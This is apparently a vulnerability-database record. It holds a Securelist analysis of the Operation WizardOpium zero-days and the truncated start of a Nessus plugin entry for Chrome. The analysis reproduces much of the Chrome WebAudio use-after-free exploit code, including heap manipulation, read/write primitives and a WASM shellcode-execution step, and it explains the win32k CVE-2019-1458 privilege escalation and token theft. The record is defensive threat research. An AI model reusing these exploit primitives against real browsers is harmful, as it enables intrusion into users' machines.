getPartitionPageMetadataArea(addr) {\n \tlet superPageOffsetMask = (BigInt(1) << BigInt(21)) - BigInt(1);\n \tlet partitionPageIndex = (addr & superPageOffsetMask) >> BigInt(14);\n \tlet pageMetadataSize = BigInt(0x20);\n \tlet partitionPageMetadataPtr = getMetadataAreaBaseFromPartitionSuperPage(addr) + partitionPageIndex * pageMetadataSize;\n \treturn partitionPageMetadataPtr;\n }\n\nIt's interesting that the exploit also uses the relatively new built-in [BigInt](<https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/BigInt>) class to handle 64-bit values; authors usually use their own primitives in exploits.\n\nAt first, the code initiates OfflineAudioContext and creates a huge number of IIRFilterNode objects that are initialized via two float arrays.\n \n \n let gcPreventer = [];\n let iirFilters = [];\n \n function initialSetup() {\n \tlet audioCtx = new OfflineAudioContext(1, 20, 3000);\n \n \tlet feedForward = new Float64Array(2);\n \tlet feedback = new Float64Array(1);\n \n \tfeedback[0] = 1;\n \tfeedForward[0] = 0;\n \tfeedForward[1] = -1;\n \n \tfor (let i = 0; i < 256; i++)\n iirFilters.push(audioCtx.createIIRFilter(feedForward, feedback));\n }\n\nAfter that, the exploit begins the initial stage of exploitation and tries to trigger a UAF bug. For that to work the exploit creates the objects that are needed for the Reverb component. It creates another huge OfflineAudioContext object and two ConvolverNode objects \u2013 ScriptProcessorNode to start audio processing and AudioBuffer for the audio channel.\n \n \n async function triggerUaF(doneCb) {\n \tlet audioCtx = new OfflineAudioContext(2, 0x400000, 48000);\n \tlet bufferSource = audioCtx.createBufferSource();\n \tlet convolver = audioCtx.createConvolver();\n \tlet scriptNode = audioCtx.createScriptProcessor(0x4000, 1, 1);\n \tlet channelBuffer = audioCtx.createBuffer(1, 1, 48000);\n \n \tconvolver.buffer = channelBuffer;\n \tbufferSource.buffer = channelBuffer;\n \n \tbufferSource.loop = true;\n \tbufferSource.loopStart = 0;\n \tbufferSource.loopEnd = 1;\n \n \tchannelBuffer.getChannelData(0).fill(0);\n \n \tbufferSource.connect(convolver);\n \tconvolver.connect(scriptNode);\n \tscriptNode.connect(audioCtx.destination);\n \n \tbufferSource.start();\n \n \tlet finished = false;\n \n \tscriptNode.onaudioprocess = function(evt) {\n \t\tlet channelDataArray = new Uint32Array(evt.inputBuffer.getChannelData(0).buffer);\n \n \t\tfor (let j = 0; j < channelDataArray.length; j++) {\n \t\tif (j + 1 < channelDataArray.length && channelDataArray[j] != 0 && channelDataArray[j + 1] != 0) {\n \t\t\tlet u64Array = new BigUint64Array(1);\n \t\t\tlet u32Array = new Uint32Array(u64Array.buffer);\n \t\t\tu32Array[0] = channelDataArray[j + 0];\n \t\t\tu32Array[1] = channelDataArray[j + 1];\n \n \t\t\tlet leakedAddr = byteSwapBigInt(u64Array[0]);\n \t\t\tif (leakedAddr >> BigInt(32) > BigInt(0x8000))\n \t\t\tleakedAddr -= BigInt(0x800000000000);\n \t\t\tlet superPageBase = getSuperPageBase(leakedAddr);\n \n \t \t\tif (superPageBase > BigInt(0xFFFFFFFF) && superPageBase < BigInt(0xFFFFFFFFFFFF)) {\n \t\t\tfinished = true;\n \t\t\tevt = null;\n \n \t\t\tbufferSource.disconnect();\n \t\t\tscriptNode.disconnect();\n \t\t\tconvolver.disconnect();\n \n \t\t\tsetTimeout(function() {\n \t\t\tdoneCb(leakedAddr);\n \t\t\t}, 1);\n \n \t\t\treturn;\n \t\t\t}\n \t\t}\n \t\t}\n \t};\n \n \taudioCtx.startRendering().then(function(buffer) {\n \t\tbuffer = null;\n \n \t\tif (!finished) {\n \t \tfinished = true;\n \t \ttriggerUaF(doneCb);\n \t\t}\n \t});\n \n \twhile (!finished) {\n \t\tconvolver.buffer = null;\n \t\tconvolver.buffer = channelBuffer;\n \t\tawait later(100); // wait 100 millseconds\n \t}\n };\n\nThis function is executed recursively. It fills the audio channel buffer with zeros, starts rendering offline and at the same time runs a loop that nullifies and resets the channel buffer of the ConvolverNode object and tries to trigger a bug. The exploit uses the later() function to simulate the Sleep function, suspend the current thread and let the Render and Audio threads finish execution right on time:\n \n \n function later(delay) {\n \treturn new Promise(resolve => setTimeout(resolve, delay));\n }\n\nDuring execution the exploit checks if the audio channel buffer contains any data that differs from the previously set zeroes. The existence of such data would mean the UAF was triggered successfully and at this stage the audio channel buffer should contain a leaked pointer.\n\nThe PartitionAlloc memory allocator has a special exploit mitigation that works as follows: when the memory region is freed, it byteswaps the address of the pointer and after that the byteswapped address is added to the FreeList structure. This complicates exploitation because the attempt to dereference such a pointer will crash the process. To bypass this technique the exploit uses the following primitive that simply swaps the pointer back:\n \n \n function byteSwapBigInt(x) {\n \tlet result = BigInt(0);\n \tlet tmp = x;\n \n \tfor (let i = 0; i < 8; i++) {\n \t\tresult = result << BigInt(8);\n \t\tresult += tmp & BigInt(0xFF);\n \t\ttmp = tmp >> BigInt(8);\n \t}\n \n \treturn result;\n }\n\nThe exploit uses the leaked pointer to get the address of the SuperPage structure and verifies it. If everything goes to plan, then it should be a raw pointer to a temporary_buffer_ object of the ReverbConvolverStage class that is passed to the callback function _initialUAFCallback_.\n \n \n let sharedAudioCtx;\n let iirFilterFeedforwardAllocationPtr;\n \n function initialUAFCallback(addr) {\n \tsharedAudioCtx = new OfflineAudioContext(1, 1, 3000);\n \n \tlet partitionPageIndexDelta = undefined;\n \tswitch (majorVersion) {\n \t\tcase 77: // 77.0.3865.75\n \t \tpartitionPageIndexDelta = BigInt(-26);\n \tbreak;\n \t\tcase 76: // 76.0.3809.87\n \t\tpartitionPageIndexDelta = BigInt(-25);\n \t \tbreak;\n \t}\n \n \tiirFilterFeedforwardAllocationPtr = getPartitionPageBaseWithinSuperPage(addr, getPartitionPageIndex(addr) + partitionPageIndexDelta) + BigInt(0xFF0);\n \n triggerSecondUAF(byteSwapBigInt(iirFilterFeedforwardAllocationPtr), finalUAFCallback);\n }\n\nThe exploit uses the leaked pointer to get the address of the raw pointer to the _feedforward__ array with the AudioArray<double> type that is present in the IIRProcessor object created with IIRFilterNode. This array should be located in the same SuperPage, but in different versions of Chrome this object is created in different PartitionPages and there is a special code inside initialUAFCallback to handle that.\n\nThe vulnerability is actually triggered not once but twice. After the address of the right object is acquired, the vulnerability is exploited again. This time the exploit uses two AudioBuffer objects of different sizes, and the previously retrieved address is sprayed inside the larger AudioBuffer. This function also executes recursively.\n \n \n let floatArray = new Float32Array(10);\n let audioBufferArray1 = [];\n let audioBufferArray2 = [];\n let imageDataArray = [];\n \n async function triggerSecondUAF(addr, doneCb) {\n \tlet counter = 0;\n \tlet numChannels = 1;\n \n \tlet audioCtx = new OfflineAudioContext(1, 0x100000, 48000);\n \n \tlet bufferSource = audioCtx.createBufferSource();\n \tlet convolver = audioCtx.createConvolver();\n \n \tlet bigAudioBuffer = audioCtx.createBuffer(numChannels, 0x100, 48000);\n \tlet smallAudioBuffer = audioCtx.createBuffer(numChannels, 0x2, 48000);\n \n \tsmallAudioBuffer.getChannelData(0).fill(0);\n \n \tfor (let i = 0; i < numChannels; i++) {\n \t\tlet channelDataArray = new BigUint64Array(bigAudioBuffer.getChannelData(i).buffer);\n \t\tchannelDataArray[0] = addr;\n \t}\n \n \tbufferSource.buffer = bigAudioBuffer;\n \tconvolver.buffer = smallAudioBuffer;\n \n \tbufferSource.loop = true;\n \tbufferSource.loopStart = 0;\n \tbufferSource.loopEnd = 1;\n \n \tbufferSource.connect(convolver);\n \tconvolver.connect(audioCtx.destination);\n \n \tbufferSource.start();\n \n \tlet finished = false;\n \n \taudioCtx.startRendering().then(function(buffer) {\n \t\tbuffer = null;\n \n \t\tif (finished) {\n \t\taudioCtx = null;\n \n \t\tsetTimeout(doneCb, 200);\n \t\treturn;\n \t\t} else {\n \t\tfinished = true;\n \n \t\tsetTimeout(function() {\n \t\ttriggerSecondUAF(addr, doneCb);\n \t\t}, 1);\n \t\t}\n \t});\n \n \twhile (!finished) {\n \t\tcounter++;\n \n \t\tconvolver.buffer = null;\n \n \t\tawait later(1); // wait 1 millisecond\n \n \t\tif (finished)\n \t\tbreak;\n \n \t\tfor (let i = 0; i < iirFilters.length; i++) {\n \t\tfloatArray.fill(0);\n \t iirFilters[i].getFrequencyResponse(floatArray, floatArray, floatArray);\n \n \t\tif (floatArray[0] != 3.1415927410125732) {\n \t\t\tfinished = true;\n \n \t \t\taudioBufferArray2.push(audioCtx.createBuffer(1, 1, 10000));\n \t\taudioBufferArray2.push(audioCtx.createBuffer(1, 1, 10000));\n \n \t\t\tbufferSource.disconnect();\n \t\t\tconvolver.disconnect();\n \n \t\t\treturn;\n \t\t}\n \t\t}\n \n \t\tconvolver.buffer = smallAudioBuffer;\n \n \t\tawait later(1); // wait 1 millisecond\n \t}\n }\n\nThis time the exploit uses the function _getFrequencyResponse()_ to check if exploitation was successful. The function creates an array of frequencies that is filled with a Nyquist filter and the source array for the operation is filled with zeroes.\n \n \n void IIRDSPKernel::GetFrequencyResponse(int n_frequencies,\n \tconst float* frequency_hz,\n \tfloat* mag_response,\n \tfloat* phase_response) {\n ...\n Vector<float> frequency(n_frequencies);\n double nyquist = this->Nyquist();\n // Convert from frequency in Hz to normalized frequency (0 -> 1),\n // with 1 equal to the Nyquist frequency.\n for (int k = 0; k < n_frequencies; ++k)\n \tfrequency[k] = frequency_hz[k] / nyquist;\n ...\n\nIf the resulting array contains a value other than **\u03c0****, **it means exploitation was successful. If that's the case, the exploit stops its recursion and executes the function _finalUAFCallback_ to allocate the audio channel buffer again and reclaim the previously freed memory. This function also repairs the heap to prevent possible crashes by allocating various objects of different sizes and performing defragmentation of the heap. The exploit also creates BigUint64Array, which is used later to create an arbitrary read/write primitive.\n \n \n async function finalUAFCallback() {\n \tfor (let i = 0; i < 256; i++) {\n \t\tfloatArray.fill(0);\n \n \tiirFilters[i].getFrequencyResponse(floatArray, floatArray, floatArray);\n \n \t\tif (floatArray[0] != 3.1415927410125732) {\n \t\tawait collectGargabe();\n \n \t\taudioBufferArray2 = [];\n \n \t\tfor (let j = 0; j < 80; j++)\n \t\taudioBufferArray1.push(sharedAudioCtx.createBuffer(1, 2, 10000));\n \n \t\tiirFilters = new Array(1);\n \t \t\tawait collectGargabe();\n \n \t\tfor (let j = 0; j < 336; j++)\n \t\t\timageDataArray.push(new ImageData(1, 2));\n \t\timageDataArray = new Array(10);\n \t\tawait collectGargabe();\n \n \t\tfor (let j = 0; j < audioBufferArray1.length; j++) {\n \t\t\tlet auxArray = new BigUint64Array(audioBufferArray1[j].getChannelData(0).buffer);\n \t\t\tif (auxArray[0] != BigInt(0)) {\n \t\t\tkickPayload(auxArray);\n \t\t\treturn;\n \t\t\t}\n \t\t}\n \n \t\treturn;\n \t\t}\n \t}\n }\n\nHeap defragmentation is performed with multiple calls to the improvised _collectGarbage_ function that creates a huge ArrayBuffer in a loop.\n \n \n function collectGargabe() {\n \tlet promise = new Promise(function(cb) {\n \t\tlet arg;\n \t\tfor (let i = 0; i < 400; i++)\n \t\tnew ArrayBuffer(1024 * 1024 * 60).buffer;\n \t\tcb(arg);\n \t});\n \treturn promise;\n }\n\nAfter those steps, the exploit executes the function _kickPayload()_ passing the previously created BigUint64Array containing the raw pointer address of the previously freed AudioArray's data.\n \n \n async function kickPayload(auxArray) {\n \tlet audioCtx = new OfflineAudioContext(1, 1, 3000);\n \tlet partitionPagePtr = getPartitionPageMetadataArea(byteSwapBigInt(auxArray[0]));\n \tauxArray[0] = byteSwapBigInt(partitionPagePtr);\n \tlet i = 0;\n \tdo {\n \t\tgcPreventer.push(new ArrayBuffer(8));\n \t\tif (++i > 0x100000)\n \t\treturn;\n \t} while (auxArray[0] != BigInt(0));\n \tlet freelist = new BigUint64Array(new ArrayBuffer(8));\n \tgcPreventer.push(freelist);\n \t...\n\nThe exploit manipulates the PartitionPage metadata of the freed object to achieve the following behavior. If the address of another object is written in BigUint64Array at index zero and if a new 8-byte object is created and the value located at index 0 is read back, then a value located at the previously set address will be read. If something is written at index 0 at this stage, then this value will be written to the previously set address instead.\n \n \n function read64(rwHelper, addr) {\n \trwHelper[0] = addr;\n \tvar tmp = new BigUint64Array;\n \ttmp.buffer;\n \tgcPreventer.push(tmp);\n \treturn byteSwapBigInt(rwHelper[0]);\n }\n \n function write64(rwHelper, addr, value) {\n \trwHelper[0] = addr;\n \tvar tmp = new BigUint64Array(1);\n \ttmp.buffer;\n \ttmp[0] = value;\n \tgcPreventer.push(tmp);\n }\n\nAfter the building of the arbitrary read/write primitives comes the final stage \u2013 executing the code. The exploit achieves this by using a popular technique that exploits the Web Assembly (WASM) functionality. Google Chrome currently allocates pages for just-in-time (JIT) compiled code with read/write/execute (RWX) privileges and this can be used to overwrite them with shellcode. At first, the exploit initiates a \"dummy\" WASM module and it results in the allocation of memory pages for JIT compiled code.\n \n \n const wasmBuffer = new Uint8Array([...]);\n const wasmBlob = new Blob([wasmBuffer], {\n \ttype: \"application/wasm\"\n });\n \n const wasmUrl = URL.createObjectURL(wasmBlob);\n var wasmFuncA = undefined;\n WebAssembly.instantiateStreaming(fetch(wasmUrl), {}).then(function(result) {\n \twasmFuncA = result.instance.exports.a;\n });\n\nTo execute the exported function _wasmFuncA_, the exploit creates a FileReader object. When this object is initiated with data it creates a FileReaderLoader object internally. If you can parse PartitionAlloc allocator structures and know the size of the next object that will be allocated, you can predict which address it will be allocated to. The exploit uses the _getPartitionPageFreeListHeadEntryBySlotSize()_ function with the provided size and gets the address of the next free block that will be allocated by FileReaderLoader.\n \n \n let fileReader = new FileReader;\n let fileReaderLoaderSize = 0x140;\n let fileReaderLoaderPtr = getPartitionPageFreeListHeadEntryBySlotSize(freelist, iirFilterFeedforwardAllocationPtr, fileReaderLoaderSize);\n if (!fileReaderLoaderPtr)\n \treturn;\n \n fileReader.readAsArrayBuffer(new Blob([]));\n \n let fileReaderLoaderTestPtr = getPartitionPageFreeListHeadEntryBySlotSize(freelist, iirFilterFeedforwardAllocationPtr, fileReaderLoaderSize);\n if (fileReaderLoaderPtr == fileReaderLoaderTestPtr)\n \treturn;\n\nThe exploit obtains this address twice to find out if the FileReaderLoader object was created and if the exploit can continue execution. The exploit sets the exported WASM function to be a callback for a FileReader event (in this case, an onerror callback) and because the FileReader type is derived from EventTargetWithInlineData, it can be used to get the addresses of all its events and the address of the JIT compiled exported WASM function.\n \n \n fileReader.onerror = wasmFuncA;\n \n let fileReaderPtr = read64(freelist, fileReaderLoaderPtr + BigInt(0x10)) - BigInt(0x68);\n \n let vectorPtr = read64(freelist, fileReaderPtr + BigInt(0x28));\n let registeredEventListenerPtr = read64(freelist, vectorPtr);\n let eventListenerPtr = read64(freelist, registeredEventListenerPtr);\n let eventHandlerPtr = read64(freelist, eventListenerPtr + BigInt(0x8));\n let jsFunctionObjPtr = read64(freelist, eventHandlerPtr + BigInt(0x8));\n \n let jsFunctionPtr = read64(freelist, jsFunctionObjPtr) - BigInt(1);\n let sharedFuncInfoPtr = read64(freelist, jsFunctionPtr + BigInt(0x18)) - BigInt(1);\n let wasmExportedFunctionDataPtr = read64(freelist, sharedFuncInfoPtr + BigInt(0x8)) - BigInt(1);\n let wasmInstancePtr = read64(freelist, wasmExportedFunctionDataPtr + BigInt(0x10)) - BigInt(1);\n \n let stubAddrFieldOffset = undefined;\n switch (majorVersion) {\n \tcase 77:\n \t\tstubAddrFieldOffset = BigInt(0x8) * BigInt(16);\n \tbreak;\n \tcase 76:\n \t\tstubAddrFieldOffset = BigInt(0x8) * BigInt(17);\n \tbreak\n }\n \n let stubAddr = read64(freelist, wasmInstancePtr + stubAddrFieldOffset);\n\nThe variable stubAddr contains the address of the page with the stub code that jumps to the JIT compiled WASM function. At this stage it's sufficient to overwrite it with shellcode. To do so, the exploit uses the function _getPartitionPageFreeListHeadEntryBySlotSize()_ again to find the next free block of 0x20 bytes, which is the size of the structure for the ArrayBuffer object. This object is created when the exploit creates a new audio buffer.\n \n \n let arrayBufferSize = 0x20;\n let arrayBufferPtr = getPartitionPageFreeListHeadEntryBySlotSize(freelist, iirFilterFeedforwardAllocationPtr, arrayBufferSize);\n if (!arrayBufferPtr)\n \treturn;\n \n let audioBuffer = audioCtx.createBuffer(1, 0x400, 6000);\n gcPreventer.push(audioBuffer);\n\nThe exploit uses arbitrary read/write primitives to get the address of the DataHolder class that contains the raw pointer to the data and size of the audio buffer. The exploit overwrites this pointer with stubAddr and sets a huge size.\n \n \n let dataHolderPtr = read64(freelist, arrayBufferPtr + BigInt(0x8));\n \n write64(freelist, dataHolderPtr + BigInt(0x8), stubAddr);\n write64(freelist, dataHolderPtr + BigInt(0x10), BigInt(0xFFFFFFF));\n\nNow all that's needed is to implant a Uint8Array object into the memory of this audio buffer and place shellcode there along with the Portable Executable that will be executed by the shellcode.\n \n \n let payloadArray = new Uint8Array(audioBuffer.getChannelData(0).buffer);\n payloadArray.set(shellcode, 0);\n payloadArray.set(peBinary, shellcode.length);\n\nTo prevent the possibility of a crash the exploit clears the pointer to the top of the FreeList structure used by the PartitionPage.\n \n \n write64(freelist, partitionPagePtr, BigInt(0));\n\nNow, in order to execute the shellcode, it's enough to call the exported WASM function.\n \n \n try {\n \twasmFuncA();\n } catch (e) {}\n\n## Microsoft Windows elevation of privilege exploit\n\nThe shellcode appeared to be a Reflective PE loader for the Portable Executable module that was also present in the exploit. This module mostly consisted of the code to escape Google Chrome's sandbox by exploiting the Windows kernel component win32k for the elevation of privileges and it was also responsible for downloading and executing the actual malware. On closer analysis, we found that the exploited vulnerability was in fact a zero-day. We notified Microsoft Security Response Center and they assigned it CVE-2019-1458 and fixed the vulnerability. The win32k component has something of bad reputation. It has been present since Windows NT 4.0 and, according to Microsoft, it is responsible for more than 50% of all kernel security bugs. In the last two years alone Kaspersky has found five zero-days in the wild that exploited win32k vulnerabilities. That's quite an interesting statistic considering that since the release of Windows 10, Microsoft has implemented a number of mitigations aimed at complicating exploitation of win32k vulnerabilities and the majority of zero-days that we found exploited versions of Microsoft Windows prior to the release of Windows 10 RS4. The elevation of privilege exploit used in Operation WizardOpium was built to support Windows 7, Windows 10 build 10240 and Windows 10 build 14393. It's also important to note that Google Chrome has a special security feature called [Win32k lockdown](<https://googleprojectzero.blogspot.com/2016/11/breaking-chain.html>). This security feature eliminates the whole win32k attack surface by disabling access to win32k syscalls from inside Chrome processes. Unfortunately, Win32k lockdown is only supported on machines running Windows 10. So, it's fair to assume that Operation WizardOpium targeted users running Windows 7.\n\nCVE-2019-1458 is an Arbitrary Pointer Dereference vulnerability. In win32k Window objects are represented by a tagWND structure. There are also a number of classes based on this structure: ScrollBar, Menu, Listbox, Switch and many others. The FNID field of tagWND structure is used to distinguish the type of class. Different classes also have various extra data appended to the tagWND structure. This extra data is basically just different structures that often include kernel pointers. Besides that, in the win32k component there's a syscall SetWindowLongPtr that can be used to set this extra data (after validation of course). It's worth noting that SetWindowLongPtr was related to a number of vulnerabilities in the past (e.g., CVE-2010-2744, CVE-2016-7255, and CVE-2019-0859). There's a [common issue](<https://securelist.com/new-win32k-zero-day-cve-2019-0859/90435/>) when pre-initialized extra data can lead to system procedures incorrectly handling. In the case of CVE-2019-1458, the validation performed by SetWindowLongPtr was just insufficient.\n \n \n xxxSetWindowLongPtr(tagWND *pwnd, int index, QWORD data, ...)\n \t...\n \tif ( (int)index >= gpsi->mpFnid_serverCBWndProc[(pwnd->fnid & 0x3FFF) - 0x29A] - sizeof(tagWND) )\n \t\t...\n \t\textraData = (BYTE*)tagWND + sizeof(tagWND) + index\n \t\told = *(QWORD*)extraData;\n \t\t*(QWORD*)extraData = data;\n \t\treturn old;\n\nA check for the index parameter would have prevented this bug, but prior to the patch the values for FNID_DESKTOP, FNID_SWITCH, FNID_TOOLTIPS inside the mpFnid_serverCBWndProc table were not initialized, rendering this check useless and allowing the kernel pointers inside the extra data to be overwritten.\n\nTriggering the bug is quite simple: at first, you create a Window, then NtUserMessageCall can be used to call any system class window procedure.\n \n \n gpsi->mpFnidPfn[(dwType + 6) & 0x1F]((tagWND *)wnd, msg, wParam, lParam, resultInfo);\n\nIt's important to provide the right message and dwType parameters. The message needs to be equal to WM_CREATE. dwType is converted to fnIndex internally with the following calculation: (dwType + 6) & 0x1F. The exploit uses a dwType equal to 0xE0. It results in an fnIndex equal to 6 which is the function index of _xxxSwitchWndProc _and the WM_CREATE message sets the FNID field to be equal to FNID_SWITCH.\n \n \n LRESULT xxxSwitchWndProc(tagWND *wnd, UINT msg, WPARAM wParam, LPARAM lParam)\n {\n ...\n pti = *(tagTHREADINFO **)&gptiCurrent;\n if ( wnd->fnid != FNID_SWITCH )\n {\n if ( wnd->fnid || wnd->cbwndExtra + 296 < (unsigned int)gpsi->mpFnid_serverCBWndProc[6] )\n return 0i64;\n if ( msg != 1 )\n return xxxDefWindowProc(wnd, msg, wParam, lParam);\n if ( wnd[1].head.h )\n return 0i64;\n wnd->fnid = FNID_SWITCH;\n }\n switch ( msg )\n {\n case WM_CREATE:\n zzzSetCursor(wnd->pcls->spcur, pti, 0i64);\n break;\n case WM_CLOSE:\n xxxSetWindowPos(wnd, 0, 0);\n xxxCancelCoolSwitch();\n break;\n case WM_ERASEBKGND:\n case WM_FULLSCREEN:\n pti->ptl = (_TL *)&pti->ptl;\n ++wnd->head.cLockObj;\n xxxPaintSwitchWindow(wnd, pti, 0i64);\n ThreadUnlock1();\n return 0i64;\n }\n return xxxDefWindowProc(wnd, msg, wParam, lParam);\n }\n\nThe vulnerability in _NtUserSetWindowLongPtr_ can then be used to overwrite the extra data at index zero, which happens to be a pointer to a structure containing information about the Switch Window. In other words, the vulnerability makes it possible to set some arbitrary kernel pointer that will be treated as this structure.\n\nAt this stage it's enough to call _NtUserMessageCall_ again, but this time with a message equal to WM_ERASEBKGND. This results in the execution of the function _xxxPaintSwitchWindow_ that increments and decrements a couple of integers located by the pointer that we previously set.\n \n \n sub [rdi+60h], ebx\n add [rdi+68h], ebx\n ...\n sub [rdi+5Ch], ecx\n add [rdi+64h], ecx\n\nAn important condition for triggering the exploitable code path is that the ALT key needs to be pressed.\n\nExploitation is performed by abusing Bitmaps. For successful exploitation a few Bitmaps need to be allocated next to each other, and their kernel addresses need to be known. To achieve this, the exploit uses two common kernel ASLR bypass techniques. For Windows 7 and Windows 10 build 10240 (Threshold 1) the Bitmap kernel addresses are leaked via the GdiSharedHandleTable [technique](<https://www.coresecurity.com/blog/abusing-gdi-for-ring0-exploit-primitives>): in older versions of the OS there is a special table available in the user level that holds the kernel addresses of all GDI objects present in the process. This particular technique was patched in Windows 10 build 14393 (Redstone 1), so for this version the exploit uses another common [technique](<https://labs.f-secure.com/archive/a-tale-of-bitmaps/>) that abuses Accelerator Tables (patched in Redstone 2). It involves creating a Create Accelerator Table object, leaking its kernel address from the gSharedInfo HandleTable available in the user level, and then freeing the Accelerator Table object and allocating a Bitmap reusing the same memory address.\n\nThe whole exploitation process works as follows: the exploit creates three bitmaps located next to each other and their addresses are leaked. The exploit prepares Switch Window and uses a vulnerability in NtUserSetWindowLongPtr to set an address pointing near the end of the first Bitmap as Switch Window extra data. Bitmaps are represented by a SURFOBJ structure and the previously set address needs to be calculated in a way that will make the xxxPaintSwitchWindow function increment the sizlBitmap field of the SURFOBJ structure for the Bitmap allocated next to the first one. The sizlBitmap field indicates the bounds of the pixel data buffer and the incremented value will allow the use of the function SetBitmapBits() to perform an out-of-bounds write and overwrite the SURFOBJ of the third Bitmap object.\n\nThe pvScan0 field of the SURFOBJ structure is an address of the pixel data buffer, so the ability to overwrite it with an arbitrary pointer results in arbitrary read/write primitives via the functions GetBitmapBits()/SetBitmapBits(). The exploit uses these primitives to parse the EPROCESS structure and steal the system token. To get the kernel address of the EPROCESS structure, the exploit uses the function [EnumDeviceDrivers](<https://docs.microsoft.com/en-us/windows/win32/api/psapi/nf-psapi-enumdevicedrivers>). This function works according to its MSDN description and it provides a list of kernel addresses for currently loaded drivers. The first address in the list is the address of ntkrnl and to get the offset to the EPROCESS structure the exploit parses an executable in search for the exported PsInitialSystemProcess variable.\n\nIt's worth noting that this technique still works in the latest versions of Windows (tested with Windows 10 19H1 build 18362). Stealing the system token is the most common post exploitation technique that we see in the majority of elevation of privilege exploits. After acquiring system privileges the exploit downloads and executes the actual malware.\n\n## Conclusions\n\nIt was particularly interesting for us to examine the Chrome exploit because it was the first Google Chrome in-the-wild zero-day encountered for a while. It was also interesting that it was used in combination with an elevation of privilege exploit that didn't allow exploitation on the latest versions of Windows mostly due to the Win32k lockdown security feature of Google Chrome. With regards to privilege elevation, it was also interesting that we found another 1-day exploit for this vulnerability just one week after the patch, indicating how simple it is to exploit this vulnerability.\n\n_We would like to thank the Google Chrome and Microsoft security teams for fixing these vulnerabilities so quickly. Google was generous enough to offer a bounty for CVE-2019-13720. The reward was donated to charity and Google matched the donation._", "modified": "2020-05-28T10:00:09", "published": "2020-05-28T10:00:09", "id": "SECURELIST:FED90A1B8959D4636DBADB1E135F7BF7", "href": "https://securelist.com/the-zero-day-exploits-of-operation-wizardopium/97086/", "type": "securelist", "title": "The zero-day exploits of Operation WizardOpium", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-03-16T11:26:03", "description": "The version of Google Chrome installed on the remote Windows host is prior to 89.0.4389.72. It is, therefore, affected\nby multiple vulnerabilities as referenced in the 2021_03_stable-channel-update-for-desktop advisory. Note that Nessus\nhas not tested for this issue but has instead relied only on the application's self-reported version number.", "edition": 4, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2021-03-02T00:00:00", "title": "Google Chrome < 89.0.4389.72 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-21168", "CVE-2021-21173", "CVE-2021-21185", "CVE-2021-21165", "CVE-2021-21179", "CVE-2021-21171", "CVE-2020-27844", "CVE-2021-21161", "CVE-2021-21178", "CVE-2021-21176", "CVE-2021-21159", "CVE-2021-21187", "CVE-2021-21180", "CVE-2021-21170", "CVE-2021-21162", "CVE-2021-21181", "CVE-2021-21167", "CVE-2021-21172", "CVE-2021-21163", "CVE-2021-21186", "CVE-2021-21166", "CVE-2021-21175", "CVE-2021-21190", "CVE-2021-21160", "CVE-2021-21184", "CVE-2021-21164", "CVE-2021-21188", "CVE-2021-21174", "CVE-2021-21177", "CVE-2021-21189", "CVE-2021-21182", "CVE-2021-21183", "CVE-2021-21169"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "GOOGLE_CHROME_89_0_4389_72.NASL", "href": "https://www.tenable.com/plugins/nessus/146948", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(146948);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/03/15\");\n\n script_cve_id(\n \"CVE-2020-27844\",\n \"CVE-2021-21159\",\n \"CVE-2021-21160\",\n \"CVE-2021-21161\",\n \"CVE-2021-21162\",\n \"CVE-2021-21163\",\n \"CVE-2021-21164\",\n \"CVE-2021-21165\",\n \"CVE-2021-21166\",\n \"CVE-2021-21167\",\n \"CVE-2021-21168\",\n \"CVE-2021-21169\",\n \"CVE-2021-21170\",\n \"CVE-2021-21171\",\n \"CVE-2021-21172\",\n \"CVE-2021-21173\",\n \"CVE-2021-21174\",\n \"CVE-2021-21175\",\n \"CVE-2021-21176\",\n \"CVE-2021-21177\",\n \"CVE-2021-21178\",\n \"CVE-2021-21179\",\n \"CVE-2021-21180\",\n \"CVE-2021-21181\",\n \"CVE-2021-21182\",\n \"CVE-2021-21183\",\n \"CVE-2021-21184\",\n \"CVE-2021-21185\",\n \"CVE-2021-21186\",\n \"CVE-2021-21187\",\n \"CVE-2021-21188\",\n \"CVE-2021-21189\",\n \"CVE-2021-21190\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0117\");\n\n script_name(english:\"Google Chrome < 89.0.4389.72 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Windows host is prior to 89.0.4389.72. It is, therefore, affected\nby multiple vulnerabilities as referenced in the 2021_03_stable-channel-update-for-desktop advisory. Note that Nessus\nhas not tested for this issue but has instead relied only on the application's self-reported version number.\");\n # https://chromereleases.googleblog.com/2021/03/stable-channel-update-for-desktop.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fc64b00e\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1171049\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1170531\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1173702\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1172054\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1111239\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1164846\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1174582\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1177465\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1161144\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1152226\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1166138\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1111646\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1152894\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1150810\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1154250\");\n script_set_attribute(attribute:\"see_also\", 